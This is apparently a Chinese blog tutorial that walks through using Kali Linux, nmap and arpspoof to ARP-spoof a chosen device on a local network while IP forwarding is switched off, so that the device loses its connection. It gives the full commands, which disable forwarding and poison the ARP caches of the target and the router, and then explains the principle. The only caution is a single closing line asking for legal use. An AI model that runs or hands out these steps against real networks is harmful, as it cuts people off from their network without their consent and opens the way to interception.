当前位置: 首页 > news >正文

ARP欺骗使局域网内设备断网

一、实验准备

  1. kali系统:可使用虚拟机软件模拟
    kali虚拟机镜像链接:https://www.kali.org/get-kali/#kali-virtual-machines
    注意虚拟机网络适配器采用桥接模式
    在这里插入图片描述

  2. 局域网内存在指定断网的设备

二、实验步骤

  1. 打开kali系统命令行:ctrl+alt+t可快速打开终端

  2. 切换到root用户

    sudo su
    
  3. 查看当前网段

    ifconfig
    

    inet 192.168.10.145 netmask 255.255.255.0
    表明当前网段为192.168.10.0

  4. 查看当前路由器ip地址

    ip route
    

    default via 192.168.10.1 dev eth0 proto dhcp src 192.168.10.145 metric 100
    192.168.10.0/24 dev eth0 proto kernel scope link src 192.168.10.145 metric 10
    表明路由器ip为192.168.10.1

  5. 扫描查看目标设备ip

    nmap -sn 192.168.10.1/24  # 使用 Nmap 发现网络中的活动主机,等效于nmap -sn 192.168.10.1-255
    

    根据设备名称找到对应ip

  6. 设置kali系统不转发数据

    echo 0 > /proc/sys/net/ipv4/ip_forward
    
  7. 执行arp欺骗

    arpspoof -i eth0 -t 192.168.10.137 -r 192.168.10.1
    
    • -i: 指定使用的网卡
    • -t:指定欺骗的设备ip地址
    • -r:指定欺骗的路由器ip地址
  8. 目标设备无法获取新数据

三、原理

ARP欺骗

  1. 复制路由器mac地址,伪装为路由器并通知目标设备,以便后续目标设备将数据交给kali
  2. 复制目标设备mac地址,伪装为目标设备并通知路由器,以便后续路由器将数据交给kali
  3. 但kali设置不转发数据,因此路由器和目标设备发送至kali的所有数据均被抛弃,致使目标设备无法与路由器沟通无法获取数据

四、特别注意

请在合法场景下进行实验

http://www.lryc.cn/news/347321.html

相关文章:

  • Android动画(四):PathMeasure实现路径动画
  • HTTP 连接详解
  • 练习题(2024/5/12)
  • Day50代码随想录动态规划part12:309.最佳买卖股票时机含冷冻期、714.买卖股票的最佳时机含手续费
  • 【软考】scrum的步骤
  • 【C语言】编译与链接
  • Consul 注册的服务地址变成了 127.0.1.1
  • 数字水印 | 离散小波变换 DWT 的 Python 代码实现
  • [框架] Unity 公共执行器
  • 二进制转为HEX数组小工具
  • 数据结构-二叉树-红黑树
  • C++11 新特性 decltype 说明符
  • java线程局部变量使用方式
  • 【隧道篇 / WAN优化】(7.4) ❀ 01. 启动WAN优化 ❀ FortiGate 防火墙
  • 2024数维杯数学建模B题生物质和煤共热解问题的研究原创论文分享
  • 中国电子学会(CEIT)2022年12月真题C语言软件编程等级考试三级(含详细解析答案)
  • 今日早报 每日精选15条新闻简报 每天一分钟 知晓天下事 5月12日,星期日
  • 微服务思想以及实现
  • C语法:格式符号%f和%lf引发的错误
  • Java基础入门day48
  • C++笔记(体系结构与内核分析)
  • c++ 唤醒指定线程
  • java报错:使用mybatis plus查询一个只返回一条数据的sql,却报错返回了1000多条
  • AI图书推荐:利用生成式AI实现业务流程超自动化
  • 什么事防抖和节流,有什么区别,如何实现
  • PanguSync大数据量初始化脚本
  • DELL T630服务器iDRAC分辨率调整办法
  • 您真的会高效使用 Mac 吗?
  • Vue11 Vue3完结撒花
  • CodeTop 高频笔试题总结(持续更新)